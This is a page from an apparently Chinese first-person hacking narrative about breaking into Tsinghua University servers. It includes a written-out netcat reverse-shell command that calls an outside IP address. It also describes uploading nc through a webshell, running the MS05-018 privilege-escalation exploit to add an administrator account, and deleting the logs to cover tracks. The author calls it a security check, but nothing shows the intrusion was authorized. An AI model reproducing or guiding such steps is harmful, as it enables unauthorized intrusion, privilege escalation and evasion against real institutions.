入侵清华大学全过程

结果前面两种思路都失败了，第一种，我找遍这个web目录，里面几个站点的sql帐号密码都是一般权限,没有找到sa权限的用户和密码。第二种密码成功破解，可以连接但是还是进不了电脑，郁闷了，看来只有试一下本地溢出，直接加用户没有成功看来是guest权限，在webshell 中感觉很多命令不好使，用nc反向连接看看，上传nc , 在webshell的cmd命令中如入 D:\www-root\nerc\nc.exe -e c:\winnt\system32\cmd.exe 202.115.7.189 8081，如图5，在本地监听8081端口，命令为nc –l –p 8081,不久就有反应了，如图6，加用户是肯定不行的，如图7 ，看来要找本地溢出的exp，夜已经很深了，窗外寂静如斯，此时的我灵台清明，睡意全无，翻阅以前的网络安全杂志（不久以前在旧书市场以低价购得，没看过），寻找关于本地溢出的敏感信息，终于找到一个，windows CSRSS本地溢出漏洞，就是ms05018，呵呵来到放在职业欠钱空间里放的lcx空间下载了ms05018.exe,安焦编译的exp ,
武器找到了来到战场，上传运行如图8


                                  图5

                              图六
 
                            图7

                                    图8  
    哈哈，也许我运气好，也许是菜鸟必有天佑吧，我技术菜，运气再不好，我看就不要搞了，直接跳楼，我住在六楼，跳下去岂有命焉，不过幸运之神仿佛罩着我，每每在入侵低迷时候总给我以胜利的曙光，犹如神助，哈哈，成功添加了一个用户具有administrator权限的用户，成功登录 如图9 ，服务器里大小若二三十个院系站点。就这么拿下了，不过这样也花了我整整一个晚上，边看书便实践还真获益匪浅，清理一下战场，删除日志，退了出来，呵呵，看了看窗外，天边可以开始泛白，不知不觉中，天亮了，睡意也开始向我袭来，睡觉吧，人不是铁打的，身体要紧。  

                        图9 （成功登录）
3、      感触良多
      Ewebeditor 在线文本编辑器上传漏洞出来这么久了，我写的那篇文章也出来一个多月了，网站管理人员还没有重视，在像清华这样名牌的大学漏洞重现，实非我等所愿，而且密码还是默认的admin/admin ,看来警报似乎没有敲响。对于这次安检鄙人获益良多，给我在以后的安检中积累了宝贵的经验。

上一页  [1] [2] [3] [4] 下一页